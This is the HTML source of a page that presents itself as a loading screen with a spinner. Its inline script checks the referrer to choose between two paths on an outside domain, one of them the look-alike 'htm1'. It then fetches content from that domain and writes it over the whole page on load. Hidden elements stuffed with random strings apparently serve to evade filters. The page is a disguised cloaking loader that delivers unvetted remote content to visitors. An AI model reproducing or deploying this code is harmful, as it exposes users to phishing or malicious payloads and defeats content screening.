<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .valV724 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .valV724 .umJ7Uojc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .valV724 .content {
            line-height: 50px;
            text-align: center
        }

        .valV724 .img {
            width: 100%
        }

        .valV724 .zRs3cJ {
            text-align: center
        }

        .valV724 .zRs3cJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .valV724 .zRs3cJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .valV724 .zRs3cJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .valV724 .zRs3cJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .valV724 .zRs3cJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .valV724 .zRs3cJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .valV724 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yUl7LBruL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var h87rY = yUl7LBruL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ h87rY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ h87rY +".html?a=share";
		}
		
        zHKfuvKi=url+"#"+new Date().getTime();
        zHKfuvKi && function() {
            $.get(zHKfuvKi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>C5heHFgy0g8137I2GvGKkJiPwkdQNg4wUgcTVShnIa9crceRoEVrU5MOfvm6PH8MoDhlJ8s6h6IKJ3skUx</span>
<img  src='' style='display:none'>
<p  style='display:none'>ytnntDCpKp7bkvpXYwU56UlLmi5DwZwngAabMnhXarTvNlVxiPnvFQM9RSXS3lz7Y2NFkB3REasAXnbS1Pak4C6qxvFDu60f</p>
<b style='display:none' >qrOQIlOVrRRek0nsToR5b14vr5v6JuJvxRIEApUkzu19cAxeRKaGu</b>
<span style='display:none'>C5heHFgy0g8137I2GvGKkJiPwkdQNg4wUgcTVShnIa9crceRoEVrU5MOfvm6PH8MoDhlJ8s6h6IKJ3skUx</span><div class="valV724">
    <div class="umJ7Uojc">
        <div class="zRs3cJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>HPLq6kLQhxPdrsCjH3KeKTNwh7uBZVEUnTMmBao4q6PLSQMzWvEUe5pSg</div>
<b style='display:none' >OjoAZlVBlIHNFCP</b>
<div style='display:none'>HPLq6kLQhxPdrsCjH3KeKTNwh7uBZVEUnTMmBao4q6PLSQMzWvEUe5pSg</div>
<div style='display:none'>HPLq6kLQhxPdrsCjH3KeKTNwh7uBZVEUnTMmBao4q6PLSQMzWvEUe5pSg</div>
<h1 style='display:none' >DjcRiiIgeHRRe4AyA1aJkdeBSK9vFk0ZL6TvHx9qXHtiEovF75GqwpLiWlDRYA</h1>
<span style='display:none'>uqYn77bxSR7DH4UkvvkkGklBDu98zIDINq7NOhfziQIo4ux4rnVjHahunhjJ2dmwkb3JJ2uSZXuU058931nWsK8Y6KB9</span>
<a  href='#' style='display:none'>lRDrM9xnFaQxRUTu1Z2R0dGPCL8dx3NeytCexJtjralgAeIVntvBY4ZgKUov0jEHZwK8eGQf00tTElTKOZdilX5l</a>
<b style='display:none' >OjoAZlVBlIHNFCP</b></body>
</html>